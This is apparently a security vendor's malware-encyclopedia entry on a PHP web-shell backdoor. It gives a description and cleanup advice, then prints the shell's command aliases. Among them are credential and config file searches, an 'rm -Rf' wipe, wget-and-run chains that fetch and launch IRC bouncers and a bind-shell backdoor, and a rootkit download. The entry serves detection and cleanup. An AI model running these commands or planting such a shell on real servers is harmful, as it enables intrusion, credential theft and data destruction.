Backdoors are server-side malicious scripts which are intended to perpetrate malicious acccess to the server. The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside. Server level analysis is necessary in case of infection by this type of malware.The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside. Server level analysis is necessary in case of infection by this type of malware.
php.backdoor.byz_webshell is a complex web-shell with several interesting functions implemented. It's able to operate on linux and windows environment and introduces separate sets of commands for each of these systems. It has also simple mailer functions implemented thus able to log the actions performed with it and send them to a specific e-mail address.
Affecting
Any PHP based web site (often through outdated WordPress, Joomla, osCommerce, Magento, Drupal and stolen passwords).
Cleanup
You can remove this file completely. You can sign up with us and let our team remove the malware for you.
Dump
This part of code demonstrates the commands usable with this web-shell:
##[ QUICK COMMANDS ]##
if (!is_windows()) {
$cmdaliases = array(
array("List Directory", "ls -al"),
array("Find all suid files", "find / -type f -perm -04000 -ls"),
array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("Find all sgid files", "find / -type f -perm -02000 -ls"),
array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("Find config.inc.php files", "find / -type f -name config.inc.php"),
array("Find config* files", "find / -type f -name "config*""),
array("Find config* files in current dir", "find . -type f -name "config*""),
array("Find all writable folders and files", "find / -perm -2 -ls"),
array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("Find all writable folders", "find / -type d -perm -2 -ls"),
array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
array("Find all service.pwd files", "find / -type f -name service.pwd"),
array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("Find all .bash_history files", "find / -type f -name .bash_history"),
array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("List file attributes on a Linux second extended file system", "lsattr -va"),
array("Show opened ports", "netstat -an | grep -i listen"),
array("-----",""),
array("Logged in users","w"),
array("Last connect","lastlog"),
array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
array("Inet Address","/sbin/ifconfig | grep inet"),
array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
array("CPU Info","cat /proc/version /proc/cpuinfo"),
array("Is gcc installed ?","locate gcc"),
array("Format box (DANGEROUS)","rm -Rf"),
array("-----",""),
array("wget & run psyBNC","wget ".$sh_sourcez["psyBNC"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1].";cd .fx;./config 29110;./fuck;./run"),
array("wget & extract EggDrop","wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1]),
array("wget & run BindDoor","wget ".$sh_sourcez["BindDoor"][0].";tar -zxvf ".$sh_sourcez["BindDoor"][1].";./bind"),
array("-----",""),
array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
);
}
else {
#Windows
$cmdaliases = array(
array("List Directory", "dir"),
array("Find index.php in current dir", "dir /s /w /b index.php"),
array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
array("Find c99shell in current dir", "find /c "c99" *"),
array("Find r57shell in current dir", "find /c "r57" *"),
array("Find fx29shell in current dir", "find /c "fx29" *"),
array("Show active connections", "netstat -an"),
array("Show running services", "net start"),
array("User accounts", "net user"),
array("Show computers", "net view"),
);
}
##[ PHP FILESYSTEM (By -==[COLUMBUS]==--) ]##
$phpfsaliases = array(
array("Read File", "read", 1, "File", ""),
array("Write File (PHP5)", "write", 2, "File","Text"),
array("Copy", "copy", 2, "From", "To"),
array("Rename/Move", "rename", 2, "File", "To"),
array("Delete", "delete", 1 ,"File", ""),
array("Make Dir","mkdir", 1, "Dir", ""),
array("Download", "download", 2, "URL", "To"),
array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
array("Change Perm (0755)", "chmod", 2, &qu
ot;File", "Perms"),
array("Find Writable Dir", "fwritabledir", 2 ,"Dir", "Max"),
array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
);